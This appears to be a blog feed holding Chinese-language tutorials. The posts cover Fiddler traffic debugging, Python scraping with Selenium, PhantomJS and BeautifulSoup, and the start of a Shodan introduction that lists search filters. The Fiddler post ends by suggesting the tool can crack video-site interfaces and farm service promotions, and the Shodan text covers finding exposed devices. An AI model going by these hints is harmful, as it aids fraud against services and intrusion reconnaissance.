Modem  Speeds。勾选之后，你会发现你的网路瞬间慢下来了很多。至于慢下来后网络速度是多少，则由CustomRules.js 中如下程序控制的：</p><blockquote><p> var m_SimulateModem: boolean = true;<br>  …<br>  if (m_SimulateModem) {<br>     // 500毫秒/KB（上传）<br>      oSession[“request-trickle-delay”] = “500”;<br> // 150毫秒/KB（下载）<br>      oSession[“response-trickle-delay”] = “150”;<br>  }</p></blockquote><p>   <strong>三、AutoResponder （自动替换功能）</strong><br>   方法是点下Fiddler 右上的AutoResponder ，勾选Enable automatic responses 和Unmatched requests passthrough ，按下右边的Add ；</p><p>  再将下方的Rule Editor 第一行修改为线上档案位址（线上档案位址也可以使用Regular Expression ，开头加上regex: 即可。）</p><p>  按下Rule Editor 第二行右边的箭头，选择Find a file … ；选择要替换成的本机端档案，按下右边的SAVE ，大功告成！</p><p>  <img src="http://static.oschina.net/uploads/img/201504/12015848_MAKK.png" alt="img"></p><p>  将线上档案替换成另一个线上档案，步骤几乎<a href="https://www.baidu.com/s?wd=一模一样&amp;tn=24004469_oem_dg&amp;rsv_dl=gh_pl_sl_csd" target="_blank" rel="noopener">一模一样</a>，差别仅在Rule Editor 第二行填入的是另一线上档案位址：</p><p>  <img src="http://static.oschina.net/uploads/img/201504/12015848_Wiqd.png" alt="img"></p><p>  更多AutoResponder的说明请参考Fiddler官方文件- AutoResponder Reference 。</p><p>  （PS：AutoResponder 这个网上有比较多的教程，我直接复制的了。）</p><p>  <strong>四：命令调试（和OD的命令调试操作基本相同）</strong></p><p>  4.1替换 Request Host。</p><p>  关键函数：urlreplace</p><p>  比如：urlreplace <a href="http://www.baidu.com" target="_blank" rel="noopener">www.baidu.com</a> <a href="http://www.360.com" target="_blank" rel="noopener">www.360.com</a></p><p>  按下Enter ，所有原先发到百度的HTTP Request 就转发到360 了。</p><pre><code> ![img](https://attach.52pojie.cn/forum/201901/25/123822ksgz891tprtwb5t4.png)     </code></pre><p>  要清除转发，请在同一位置输入：</p><p>  urlreplace</p><p>  另外script也可以做到：</p><blockquote><p>if ( oSession . HostnameIs ( ‘<a href="http://www.baidu.com&#39;" target="_blank" rel="noopener">www.baidu.com&#39;</a> ) )<br>    oSession . 
hostname = ‘<a href="http://www.360.com&#39;" target="_blank" rel="noopener">www.360.com&#39;</a> ;</p></blockquote><p>  4.2 下断点（和OD、VS调试一样的哦）</p><blockquote><p>命令介绍：<br> bpu在请求开始时中断,<br> bpafter在响应到达时中断,<br> bps在特定http状态码时中断,<br> bpv/bpm在特定请求method时中断。</p></blockquote><p>  如：</p><p>  bpu <a href="http://www.baidu.com/52pj/" target="_blank" rel="noopener">www.baidu.com/52pj/</a>狂暴补师亚丝娜 </p><p>  这样既可在访问这个网址的时候自动下断点哦。</p><p>  4.3Fiddler其他内置命令(4.3为转载）</p><ul><li>secret</li></ul><blockquote><p>选择所有相应类型（指content-type）为指定类型的HTTP请求，如选择图片，使用命令select  image.而select css则可以选择所有相应类型为css的请求，select  html则选择所有响应为HTML的请求（怎么样，是不是跟SQL语句很像？）。</p></blockquote><ul><li>allbut</li></ul><blockquote><p>allbut命令用于选择所有响应类型不是给定类型的HTTP请求。如allbut   image用于选择所有相应类型不是图片的session(HTTP请求)，该命令还有一个别名keeponly.需要注意的是，keeponly和allbut命令是将不是该类型的session删除，留下的都是该类型的响应。因此，如果你执行allbut  xxxx（不存在的类型），实际上类似与执行cls命令（删除所有的session, ctrl+x快捷键也是这个作用）</p></blockquote><ul><li>?text</li></ul><blockquote><p>选择所有 URL 匹配问号后的字符的全部 session</p></blockquote><ul><li>>size 和 &lt;size命令</li></ul><blockquote><p>选择响应大小大于某个大小（单位是b）或者小于某个大小的所有HTTP请求</p></blockquote><ul><li>=status命令</li></ul><blockquote><p>选择响应状态等于给定状态的所有HTTP请求。</p></blockquote><p>   例如，选择所有状态为200的HTTP请求：=200</p><ul><li>@host命令</li></ul><blockquote><p>选择包含指定 HOST 的全部 HTTP请求。例如：@csdn.net</p></blockquote><p>  <strong>五、“逆向”</strong></p><p>  这里只能简单提及一下，当你发现下断点的网址过后，可以使用ctrl+F的方式，就行搜索该网址，既可看是什么接口返回的该地址，也就是简单的逆向！</p><p>  最后：</p><p>  熟练掌握Fiddler，能够<a href="https://www.52pojie.cn" target="_blank" rel="noopener">破解</a>爱奇艺、优酷等永久不失效的接口，也可薅羊毛（饿了么等），具体就要看大家的掌握程度了！破解游戏啥的就不说了。</p>]]></content>
      
      
      <categories>
          
          <category> fiddler </category>
          
      </categories>
      
      
        <tags>
            
            <tag> fiddler </tag>
            
        </tags>
      
    </entry>
    
    
    
    <entry>
      <title>Python Web Crawling in Practice, Part 7: Scraping Dynamic Pages with Selenium + PhantomJS</title>
      <link href="/Coderzgh.github.io/2019/05/19/python-crawler-static-sample-7/"/>
      <url>/Coderzgh.github.io/2019/05/19/python-crawler-static-sample-7/</url>
      
        <content type="html"><![CDATA[<ul><li><h2 id="正文："><a href="#正文：" class="headerlink" title="正文："></a>Main text:</h2><h2 id="一、Selenium"><a href="#一、Selenium" class="headerlink" title="一、Selenium"></a>I. Selenium</h2><h3 id="1、Selenium是什么"><a href="#1、Selenium是什么" class="headerlink" title="1、Selenium是什么"></a>1. What is Selenium</h3><p>What is Selenium? In one sentence: a browser automation and testing tool. It supports the mainstream graphical browsers, including Chrome, Safari, and Firefox. Once the matching driver is installed for one of these browsers, web UI tests can be run against it conveniently. In other words, Selenium supports drivers for these browsers.</p><h3 id="2、安装Selenium"><a href="#2、安装Selenium" class="headerlink" title="2、安装Selenium"></a>2. Installing Selenium</h3><ul><li>Option 1: pip install selenium</li><li>Option 2: <a href="https://pypi.org/simple/selenium/" target="_blank" rel="noopener">download the source</a>, unpack it, change into the unpacked directory, and run python setup.py install</li></ul><h3 id="3、安装浏览器驱动"><a href="#3、安装浏览器驱动" class="headerlink" title="3、安装浏览器驱动"></a>3. Installing the browser driver</h3><p>For Chrome, download <a href="https://sites.google.com/a/chromium.org/chromedriver/downloads" target="_blank" rel="noopener">chromedriver.exe</a> and copy it into the Scripts directory under the Python installation path.</p><p>The procedure is similar for other browsers.</p><h3 id="4、快速体验Selenium"><a href="#4、快速体验Selenium" class="headerlink" title="4、快速体验Selenium"></a>4. A quick tour of Selenium</h3><p>Open a browser from Python and load the Baidu home page automatically:</p><pre><code>from selenium import webdriver

browser = webdriver.Chrome()
browser.get(&#39;http://www.baidu.com/&#39;)</code></pre><p>Open a browser and search Baidu for the keyword "Python" automatically:</p><pre><code>from selenium import webdriver
from selenium.webdriver.common.keys import Keys

browser = webdriver.Chrome()
browser.get(&#39;https://www.baidu.com&#39;)
input = browser.find_element_by_id(&#39;kw&#39;)
input.send_keys(&#39;Python&#39;)
input.send_keys(Keys.ENTER)</code></pre><h3 id="5、爬取网页代码：自动在百度中搜索“Python”关键词后的网页"><a href="#5、爬取网页代码：自动在百度中搜索“Python”关键词后的网页" class="headerlink" title="5、爬取网页代码：自动在百度中搜索“Python”关键词后的网页"></a>5. Scraping page source: the page returned after searching Baidu for "Python"</h3><pre><code>from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.wait import WebDriverWait

browser = webdriver.Chrome()
try:
    browser.get(&#39;https://www.baidu.com&#39;)
    input = browser.find_element_by_id(&#39;kw&#39;)
    input.send_keys(&#39;Python&#39;)
    input.send_keys(Keys.ENTER)
    # Wait up to 10 seconds for the search results container to appear
    wait = WebDriverWait(browser, 10)
    wait.until(EC.presence_of_element_located((By.ID, &#39;content_left&#39;)))
    print(browser.current_url)
    print(browser.get_cookies())
    print(browser.page_source)
finally:
    browser.close()</code></pre><p>For more detail on Selenium, see the <a href="http://selenium-python-zh.readthedocs.io/en/latest/index.html" target="_blank" rel="noopener">Chinese translation of the Selenium with Python documentation</a>.</p><h2 id="二、PhantomJS"><a href="#二、PhantomJS" class="headerlink" title="二、PhantomJS"></a>II. PhantomJS</h2><h3 id="1、PhantomJs是什么？"><a href="#1、PhantomJs是什么？" class="headerlink" title="1、PhantomJs是什么？"></a>1. What is PhantomJS?</h3><p>PhantomJS is a WebKit-based headless browser. It loads a site into memory and executes the JavaScript on the page. Because it does not render a graphical interface, it runs more efficiently than a full browser.</p><p>When scraping dynamic pages, PhantomJS typically renders the page and runs the JS, Selenium drives the browser and connects it to Python, and Python does the post-processing. The three work very well together.</p><h3 id="2、安装PhantomJS"><a href="#2、安装PhantomJS" class="headerlink" title="2、安装PhantomJS"></a>2. Installing PhantomJS</h3><p><a href="http://phantomjs.org/download.html" target="_blank" rel="noopener">Official PhantomJS download page</a><br> After downloading, unpack the archive to get the phantomjs-2.1.1-windows folder. The phantomjs.exe file in the bin directory is the one actually needed; the files in the examples directory are the official sample code.</p><p>PhantomJS can be used either by setting an environment variable or by giving its path explicitly. To use the environment variable, add the bin directory of phantomjs-2.1.1-windows to path; in my case the path is D:\python\PythonLibs\phantomjs-2.1.1-windows\bin</p><p>Print the PhantomJS version to check that it works:</p><ul><li>If the system environment variable is configured, type this directly in a cmd console: phantomjs -v</li><li>If it is not configured, change into the directory that contains phantomjs.exe, for example D:\Python\PythonLibs\phantomjs-2.1.1-windows\bin, and then run phantomjs -v</li></ul><h3 id="3、快速体验PhantomJS"><a href="#3、快速体验PhantomJS" class="headerlink" title="3、快速体验PhantomJS"></a>3. A quick tour of PhantomJS</h3><p>Usage: change into the directory that contains phantomjs.exe, then run phantomjs followed by the absolute path of the script file.</p><p>Running hello.js from the official examples (assuming the environment variable is not configured):</p><pre><code>D:\DataguruPyhton&gt;cd D:\python\PythonLibs\phantomjs-2.1.1-windows\bin
D:\Python\PythonLibs\phantomjs-2.1.1-windows\bin&gt;phantomjs D:\python\PythonLibs\phantomjs-2.1.1-windows\examples\hello.js
Output:
Hello, world!</code></pre><p>The code in hello.js is:</p><pre><code>&quot;use strict&quot;;
console.log(&#39;Hello, world!&#39;);
phantom.exit();</code></pre><p>Running version.js from the official examples (assuming the environment variable is not configured):</p><pre><code>D:\Python\PythonLibs\phantomjs-2.1.1-windows\bin&gt;phantomjs D:\python\PythonLibs\phantomjs-2.1.1-windows\examples\version.js
Output:
using PhantomJS version 2.1.1</code></pre><p>The code in version.js is:</p><pre><code>&quot;use strict&quot;;
console.log(&#39;using PhantomJS version &#39; +
  phantom.version.major + &#39;.&#39; +
  phantom.version.minor + &#39;.&#39; +
  phantom.version.patch);
phantom.exit();</code></pre><p>For more detail on PhantomJS, see the <a href="http://phantomjs.org/documentation/" target="_blank" rel="noopener">official PhantomJS documentation</a>.</p><h2 id="三、Selenium-PhantomJS结合使用"><a href="#三、Selenium-PhantomJS结合使用" class="headerlink" title="三、Selenium+PhantomJS结合使用"></a>III. Using Selenium and PhantomJS together</h2><p>Selenium + PhantomJS example 1</p><pre><code>from selenium import webdriver
# The Keys package is needed to send keyboard keys
from selenium.webdriver.common.keys import Keys

# Create the browser object from an explicit PhantomJS path
# (use this when PhantomJS is not on the path environment variable)
driver = webdriver.PhantomJS(executable_path=r&#39;D:\python\PythonLibs\phantomjs-2.1.1-windows\bin\phantomjs&#39;)
# Create the browser object from the PhantomJS found via the environment variable
# (use this when PhantomJS is already on the path)
# driver = webdriver.PhantomJS()
driver.set_window_size(1366, 768)
# get() blocks until the page has loaded before the program continues;
# tests often add time.sleep(2) here
driver.get(&quot;http://www.baidu.com/&quot;)
# Get the text content of the element whose id is wrapper
data = driver.find_element_by_id(&#39;wrapper&#39;).text
# Print the data
print(data)
# 把百度设为主页关于百度About  Baidu百度推广
# ©2018 Baidu 使用百度前必读 意见反馈 京ICP证030173号  京公网安备11000002000001号
print(driver.title)  # result: 百度一下，你就知道
# Take a screenshot of the page and save it
driver.save_screenshot(r&#39;D:\DataguruPyhton\PythonSpider\images\baidu.png&#39;)
# id=&quot;kw&quot; is the Baidu search box; type the string &quot;长城&quot; into it
driver.find_element_by_id(&#39;kw&#39;).send_keys(u&#39;长城&#39;)
# id=&quot;su&quot; is the Baidu search button; click() simulates a click
driver.find_element_by_id(&#39;su&#39;).click()
# Take a screenshot of the new page
driver.save_screenshot(r&#39;D:\DataguruPyhton\PythonSpider\images\长城.png&#39;)
# Print the page source after rendering
print(driver.page_source)
# Get the cookies of the current page
print(driver.get_cookies())
driver.quit()</code></pre><p>Selenium + PhantomJS example 2</p><pre><code>from selenium import webdriver
import time
# The Keys package is needed to send keyboard keys
from selenium.webdriver.common.keys import Keys

# Create the browser object from an explicit PhantomJS path
# (use this when PhantomJS is not on the path environment variable)
driver = webdriver.PhantomJS(executable_path=r&#39;D:\python\PythonLibs\phantomjs-2.1.1-windows\bin\phantomjs&#39;)
# Create the browser object from the PhantomJS found via the environment variable
# (use this when PhantomJS is already on the path)
# driver = webdriver.PhantomJS()
driver.set_window_size(1366, 768)
# get() blocks until the page has loaded before the program continues;
# tests often add time.sleep(2) here
driver.get(&quot;http://www.baidu.com/&quot;)
# id=&quot;kw&quot; is the Baidu search box; type the string &quot;情人节&quot; into it
driver.find_element_by_id(&#39;kw&#39;).send_keys(u&#39;情人节&#39;)
# ctrl+a selects everything in the search box
driver.find_element_by_id(&#39;kw&#39;).send_keys(Keys.CONTROL, &#39;a&#39;)
# ctrl+x cuts the contents of the search box
driver.find_element_by_id(&#39;kw&#39;).send_keys(Keys.CONTROL, &#39;x&#39;)
# Type new content into the search box
driver.find_element_by_id(&#39;kw&#39;).send_keys(&#39;鲜花&#39;)
# Simulate pressing Enter
driver.find_element_by_id(&#39;su&#39;).send_keys(Keys.RETURN)
time.sleep(5)
# Clear the search box
driver.find_element_by_id(&#39;kw&#39;).clear()
# Take a screenshot of the new page
driver.save_screenshot(r&#39;D:\DataguruPyhton\PythonSpider\images\鲜花.png&#39;)
# Get the current url
print(driver.current_url)
driver.quit()</code></pre><p>Selenium + PhantomJS example 3: scraping data from a dynamic page that uses Ajax</p><pre><code>## Selenium+PhantomJS scraping of an Ajax page: wait with a fixed delay
from selenium import webdriver
import time

driver = webdriver.PhantomJS(executable_path=r&#39;D:\python\PythonLibs\phantomjs-2.1.1-windows\bin\phantomjs&#39;)
driver.get(&quot;http://pythonscraping.com/pages/javascript/ajaxDemo.html&quot;)
# driver.page_source
time.sleep(3)
print(driver.find_element_by_id(&quot;content&quot;).text)
driver.close()</code></pre><p>Improved code</p><pre><code>## Selenium+PhantomJS scraping of an Ajax page: wait until the page has finished loading
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC

driver = webdriver.PhantomJS(executable_path=r&#39;D:\python\PythonLibs\phantomjs-2.1.1-windows\bin\phantomjs&#39;)
driver.get(&quot;http://pythonscraping.com/pages/javascript/ajaxDemo.html&quot;)
try:
    # Wait up to 10 seconds for the element that appears once the Ajax call completes
    element = WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.ID, &quot;loadedButton&quot;)))
finally:
    print(driver.find_element_by_id(&quot;content&quot;).text)
    driver.close()</code></pre><p>Selenium + PhantomJS example 4: scraping data from a dynamic page that redirects</p><pre><code>from selenium import webdriver
import time
from selenium.common.exceptions import StaleElementReferenceException


def waitForLoad(driver):
    elem = driver.find_element_by_tag_name(&quot;html&quot;)
    count = 0
    while True:
        count += 1
        if count &gt; 20:
            print(&quot;Timing out after 10 seconds and returning&quot;)
            return
        time.sleep(.5)
        try:
            # Once the redirect replaces the page, the old element goes stale
            elem == driver.find_element_by_tag_name(&quot;html&quot;)
        except StaleElementReferenceException:
            return


driver = webdriver.PhantomJS(executable_path=r&#39;D:\python\PythonLibs\phantomjs-2.1.1-windows\bin\phantomjs&#39;)
driver.get(&quot;http://pythonscraping.com/pages/javascript/redirectDemo1.html&quot;)
waitForLoad(driver)
print(driver.page_source)</code></pre><h2 id="四、Selenium-PhantomJS使用时报错原因及解决方案"><a href="#四、Selenium-PhantomJS使用时报错原因及解决方案" class="headerlink" title="四、Selenium+PhantomJS使用时报错原因及解决方案"></a>IV. Why Selenium + PhantomJS raises a warning, and how to fix it</h2><h3 id="1、现象"><a href="#1、现象" class="headerlink" title="1、现象"></a>1. Symptom</h3><p>Log output:</p><pre><code>UserWarning: Selenium support for PhantomJS has been deprecated, please use headless versions of Chrome or Firefox instead
  warnings.warn(&#39;Selenium support for PhantomJS has been deprecated, please use headless &#39;</code></pre><p>In other words, Selenium has dropped PhantomJS and recommends headless Firefox or headless Chrome instead.</p><h3 id="2、解决方案"><a href="#2、解决方案" class="headerlink" title="2、解决方案"></a>2. Solutions</h3><ul><li>Option 1: downgrade Selenium. Uninstall the current version and reinstall an older one, for example pip install selenium==3.8.0</li><li>Option 2: use Selenium + Headless Firefox or Selenium + Headless Chrome</li></ul><blockquote><p>Selenium + Headless Chrome will be covered in detail in the next article.</p></blockquote><h2 id="五、本篇文章中的代码，运行环境"><a href="#五、本篇文章中的代码，运行环境" class="headerlink" title="五、本篇文章中的代码，运行环境"></a>V. Environment used to run the code in this article</h2><ul><li>Python 3.6.4</li><li>selenium 3.8.0</li><li>phantomjs-2.1.1-windows</li><li>chromedriver.exe</li></ul><h2 id="六、彩蛋：pillow对图片进行处理"><a href="#六、彩蛋：pillow对图片进行处理" class="headerlink" title="六、彩蛋：pillow对图片进行处理"></a>VI. Bonus: processing images with pillow</h2><p>This lays the groundwork for reading image CAPTCHAs later.</p><pre><code># pillow must be installed first: pip install pillow
from PIL import Image, ImageFilter

kitten = Image.open(r&quot;D:\DataguruPyhton\PythonSpider\images\girl1.jpg&quot;)
blurryKitten = kitten.filter(ImageFilter.GaussianBlur)
blurryKitten.save(r&quot;D:\DataguruPyhton\PythonSpider\images\girl2.jpg&quot;)
blurryKitten.show()</code></pre></li></ul>]]></content>
      
      
      <categories>
          
          <category> Python </category>
          
      </categories>
      
      
        <tags>
            
            <tag> Python </tag>
            
            <tag> Selenium </tag>
            
            <tag> PhantomJS </tag>
            
        </tags>
      
    </entry>
    
    
    
    <entry>
      <title>Python Web Crawling in Practice, Part 6: Scraping Static Pages</title>
      <link href="/Coderzgh.github.io/2019/05/18/python-crawler-static-sample-6/"/>
      <url>/Coderzgh.github.io/2019/05/18/python-crawler-static-sample-6/</url>
      
        <content type="html"><![CDATA[<ul><li><h2 id="正文："><a href="#正文：" class="headerlink" title="正文："></a>Main text:</h2><h2 id="预备知识点：正则表达式之-pattern-、pattern-、-pattern-、-pattern"><a href="#预备知识点：正则表达式之-pattern-、pattern-、-pattern-、-pattern" class="headerlink" title="预备知识点：正则表达式之 pattern+?、pattern*?、(?!pattern)、(?:pattern)"></a>Background: the regular expressions pattern+?, pattern*?, (?!pattern), and (?:pattern)</h2><h3 id="pattern-、pattern"><a href="#pattern-、pattern" class="headerlink" title="pattern+?、pattern*?"></a>pattern+?, pattern*?</h3><p>These two are used often and denote lazy (non-greedy) matching, that is, matching the shortest string that satisfies the pattern. By default + and * are greedy and match the longest possible string; appending ? to them requests lazy matching instead.</p><h3 id="pattern"><a href="#pattern" class="headerlink" title="(?!pattern)"></a>(?!pattern)</h3><p>This is a negative lookahead: matching can continue at the current position only if pattern does not match there, so it acts as a filter that rejects strings matching pattern. It is very useful when analyzing logs; for example, to filter out log lines that contain the marker info, write <code>^(?!.*info).*$</code>.</p><h3 id="pattern-1"><a href="#pattern-1" class="headerlink" title="(?:pattern)"></a>(?:pattern)</h3><p>This is a non-capturing group. It exists mainly as a performance optimization and does not affect what is matched: the text matched by the subexpression in parentheses is not returned as a group and cannot be referenced by backreferences such as <code>\1</code> or <code>\2</code>.</p><h2 id="案例实战一"><a href="#案例实战一" class="headerlink" title="案例实战一"></a>Case study 1</h2><p>Extract the article URLs from the page <a href="https://en.wikipedia.org/wiki/Kevin_Bacon" target="_blank" rel="noopener">https://en.wikipedia.org/wiki/Kevin_Bacon</a></p><h3 id="尝试1"><a href="#尝试1" class="headerlink" title="尝试1"></a>Attempt 1</h3><pre><code>## Attempt 1: fetch the page content
from urllib.request import urlopen
from bs4 import BeautifulSoup

html = urlopen(r&#39;https://en.wikipedia.org/wiki/Kevin_Bacon&#39;)
bsObj = BeautifulSoup(html, &#39;lxml&#39;)
print(bsObj.prettify())</code></pre><h3 id="尝试2"><a href="#尝试2" class="headerlink" title="尝试2"></a>Attempt 2</h3><pre><code>## Attempt 2: collect every a tag on the page and print the URL of each one that has an href attribute
from urllib.request import urlopen
from bs4 import BeautifulSoup

html = urlopen(r&#39;https://en.wikipedia.org/wiki/Kevin_Bacon&#39;)
bsObj = BeautifulSoup(html, &#39;lxml&#39;)
allLinks = bsObj.findAll(&quot;a&quot;)
print(len(allLinks))  # 780
for link in allLinks:
    if &quot;href&quot; in link.attrs:
        print(link.attrs[&quot;href&quot;])</code></pre><blockquote><p>Analyzing the output of Attempt 2 reveals the following pattern for article links:</p><p>1. They sit inside the div tag whose id is bodyContent;</p><p>2. Their URLs contain no colon;</p><p>3. Their URLs start with /wiki/</p></blockquote><h3 id="正式提取"><a href="#正式提取" class="headerlink" title="正式提取"></a>Final extraction</h3><pre><code>## Final extraction of the Wikipedia article URLs
from urllib.request import urlopen
from bs4 import BeautifulSoup
import re

html = urlopen(r&#39;https://en.wikipedia.org/wiki/Kevin_Bacon&#39;)
bsObj = BeautifulSoup(html, &#39;lxml&#39;)
allLinks = bsObj.find(&#39;div&#39;, {&#39;id&#39;: &#39;bodyContent&#39;}).findAll(&#39;a&#39;, href=re.compile(&quot;^(/wiki/)((?!:).)*$&quot;))
# allLinks
# allLinks[0]
# # result: &lt;a class=&quot;mw-disambig&quot; href=&quot;/wiki/Kevin_Bacon_(disambiguation)&quot; title=&quot;Kevin Bacon (disambiguation)&quot;&gt;Kevin Bacon (disambiguation)&lt;/a&gt;
# allLinks[0].text
# # result: &#39;Kevin Bacon (disambiguation)&#39;
# allLinks[0].attrs[&#39;class&#39;]
# # result: [&#39;mw-disambig&#39;]
# allLinks[0].attrs[&#39;href&#39;]
# # result: &#39;/wiki/Kevin_Bacon_(disambiguation)&#39;
# allLinks[0].attrs[&#39;title&#39;]
# # result: &#39;Kevin Bacon (disambiguation)&#39;
# print(len(allLinks))  # 380
for link in allLinks:
    if &#39;href&#39; in link.attrs:
        print(link.attrs[&#39;href&#39;])</code></pre><h2 id="案例实战二"><a href="#案例实战二" class="headerlink" title="案例实战二"></a>Case study 2</h2><p>Extract the article URLs from the page <a href="https://en.wikipedia.org/wiki/Kevin_Bacon" target="_blank" rel="noopener">https://en.wikipedia.org/wiki/Kevin_Bacon</a> as well as the article URLs on the pages it links to</p><pre><code>from urllib.request import urlopen
from bs4 import BeautifulSoup
import re
import datetime
import random


def getLinks(articleUrl):
    html = urlopen(&quot;https://en.wikipedia.org&quot; + articleUrl)
    bsObj = BeautifulSoup(html, &#39;lxml&#39;)
    return bsObj.find(&#39;div&#39;, {&#39;id&#39;: &#39;bodyContent&#39;}).findAll(&#39;a&#39;, href=re.compile(&quot;^(/wiki/)((?!:).)*$&quot;))


links = getLinks(&quot;/wiki/Kevin_Bacon&quot;)
# Seed the generator with the system time so that each run follows a different random path.
# A numeric timestamp is used because random.seed() rejects datetime objects on Python 3.11+.
random.seed(datetime.datetime.now().timestamp())
while len(links) &gt; 0:
    newArticle = links[random.randint(0, len(links) - 1)].attrs[&quot;href&quot;]
    print(newArticle)
    links = getLinks(newArticle)</code></pre></li></ul><blockquote><p>The code above has two weaknesses:</p><p>1. It may go from page A to page B and then back to page A;</p><p>2. It has no exception handling.</p></blockquote><h2 id="案例实战三"><a href="#案例实战三" class="headerlink" title="案例实战三"></a>Case study 3</h2><p>Extract the URL, title, and summary of an article and of the articles it links to</p><pre><code>from urllib.request import urlopen
from bs4 import BeautifulSoup
import re

pages = set()  # URL container: collects newly found URLs and filters out URLs already crawled


def getLinks(pageUrl):
    global pages  # declared as a global variable
    html = urlopen(&quot;https://en.wikipedia.org&quot; + pageUrl)
    bsObj = BeautifulSoup(html, &quot;lxml&quot;)
    try:
        # Characteristics of a Wikipedia article page:
        # 1. Every title is in an h1-&gt;span tag, and there is only one title tag
        # 2. The body text is in div#bodyContent; the first paragraph is div#mw-content-text-&gt;p
        # 3. The edit link appears only on article pages, inside li#ca-edit: li#ca-edit-&gt;span-&gt;a
        print(&quot;https://en.wikipedia.org&quot; + pageUrl)
        print(bsObj.h1.get_text())
        print(bsObj.find(id=&quot;mw-content-text&quot;).findAll(&quot;p&quot;)[0])
        print(bsObj.find(id=&quot;ca-edit&quot;).find(&quot;span&quot;).find(&quot;a&quot;).attrs[&#39;href&#39;])
    except AttributeError:
        print(&quot;This page is missing something! No worries though!&quot;)
    allLinks = bsObj.find_all(&quot;a&quot;, href=re.compile(&quot;^(/wiki/)((?!:).)*$&quot;))
    for link in allLinks:
        if &#39;href&#39; in link.attrs:
            newPage = link.attrs[&#39;href&#39;]
            if newPage not in pages:  # skip pages that were already crawled
                print(&quot;------------------------\n&quot; + newPage)
                pages.add(newPage)
                getLinks(newPage)


getLinks(&quot;/wiki/Farouk_Topan&quot;)</code></pre><h2 id="案例实战四"><a href="#案例实战四" class="headerlink" title="案例实战四"></a>Case study 4</h2><p>Define functions that collect all the external links on a page</p><pre><code>from urllib.request import urlopen
from bs4 import BeautifulSoup
import datetime
import random
import re

random.seed(datetime.datetime.now().timestamp())
allExtLinks = set()
allIntLinks = set()


# Return a list of all internal links on the page
def getInternalLinks(bsObj, includeUrl):
    internalLinks = []
    # Finds all links that begin with a &quot;/&quot;
    for link in bsObj.findAll(&quot;a&quot;, href=re.compile(&quot;^(/.*&quot; + includeUrl + &quot;)&quot;)):
        if link.attrs[&quot;href&quot;] is not None:
            if link.attrs[&quot;href&quot;] not in internalLinks:
                internalLinks.append(link.attrs[&quot;href&quot;])
    return internalLinks


# Return a list of all external links on the page
def getExternallLinks(bsObj, excludeUrl):
    externalLinks = []
    # Finds all links that start with &quot;http&quot; or &quot;www&quot; that do not contain the current URL
    for link in bsObj.findAll(&quot;a&quot;, href=re.compile(&quot;^(http|www)((?!&quot; + excludeUrl + &quot;).)*$&quot;)):
        if link.attrs[&quot;href&quot;] is not None:
            if link.attrs[&#39;href&#39;] not in externalLinks:
                externalLinks.append(link.attrs[&#39;href&#39;])
    return externalLinks


# Split a URL into its parts
def splitAddress(address):
    addressParts = address.replace(&quot;http://&quot;, &quot;&quot;).split(&quot;/&quot;)
    return addressParts


# Collects a list of all external URLs found on the site
def getAllExternalLinks(siteUrl):
    html = urlopen(siteUrl)
    bsObj = BeautifulSoup(html, &#39;lxml&#39;)
    internalLinks = getInternalLinks(bsObj, splitAddress(siteUrl)[0])
    externalLinks = getExternallLinks(bsObj, splitAddress(siteUrl)[0])
    for link in externalLinks:
        if link not in allExtLinks:
            allExtLinks.add(link)
            print(link)
    for link in internalLinks:
        if link not in allIntLinks:
            allIntLinks.add(link)
            getAllExternalLinks(&quot;http:&quot; + link)


getAllExternalLinks(&quot;http://oreilly.com&quot;)</code></pre>]]></content>
      
      
      <categories>
          
          <category> Python </category>
          
      </categories>
      
      
        <tags>
            
            <tag> Python </tag>
            
        </tags>
      
    </entry>
    
    
    
    <entry>
      <title>What is Shodan?</title>
      <link href="/Coderzgh.github.io/2019/05/17/how-shodan/"/>
      <url>/Coderzgh.github.io/2019/05/17/how-shodan/</url>
      
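        <content type="html"><![CDATA[<h2 id="什么是-Shodan？"><a href="#什么是-Shodan？" class="headerlink" title="什么是 Shodan？"></a>What is Shodan?</h2><p>Shodan is a search engine, but unlike Google, which searches websites, Shodan searches for devices that are online in cyberspace. You can use it to look up a specific device or a particular type of device. The most popular searches on Shodan include webcam, linksys, cisco, netgear, and SCADA.</p><p><strong>So how does Shodan work? It scans devices across the Internet and collects and parses the banner that each device returns. From these banners Shodan can tell which web server is the most popular on the network, or how many FTP servers allow anonymous login.</strong></p><h2 id="基本用法"><a href="#基本用法" class="headerlink" title="基本用法"></a>Basic usage</h2><p>As with Google, type what you want to find into the search box on the home page. For example, here is a search for “SSH”:</p><p><a href="http://image.3001.net/images/20161128/14803149659337.png" target="_blank" rel="noopener"><img src="http://image.3001.net/images/20161128/14803149659337.png!small" alt="27-1.png"></a></p><p>The results page in the screenshot above has two parts. The left side shows summary statistics, including:</p><ul><li>Results map – a map of the search results</li><li>Top services (Ports) – the most common services/ports</li><li>Top organizations (ISPs) – the most common organizations/ISPs</li><li>Top operating systems – the most common operating systems</li><li>Top products (Software name) – the most common products/software names</li></ul><p>The main panel in the middle lists the individual results, each containing:</p><ul><li>IP address</li><li>Hostname</li><li>ISP</li><li>The time the entry was indexed</li><li>The country where the host is located</li><li>Banner information</li></ul><p>To see the details of an entry, click the details button beneath it. The URL then takes the form <code>https://www.shodan.io/host/[IP]</code>, so you can also view the details of a given IP by visiting that URL directly.</p><p><a href="http://image.3001.net/images/20161128/14803149873250.png" target="_blank" rel="noopener"><img src="http://image.3001.net/images/20161128/14803149873250.png!small" alt="27-2.png"></a></p><p>In the screenshot above, the map at the top shows the physical location of the host, the left side shows information about the host, and the right side lists the ports of the target host along with their details.</p><h3 id="使用搜索过滤"><a href="#使用搜索过滤" class="headerlink" title="使用搜索过滤"></a>Using search filters</h3><p>Searching with a bare keyword as above often gives unsatisfying results. In that case, use filter commands to narrow the results. The common filters are:</p><ul><li><code>hostname</code>: search for a host or domain name, e.g. <code>hostname:&quot;google&quot;</code></li><li><code>port</code>: search for a port or service, e.g. <code>port:&quot;21&quot;</code></li><li><code>country</code>: search by country, e.g. 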
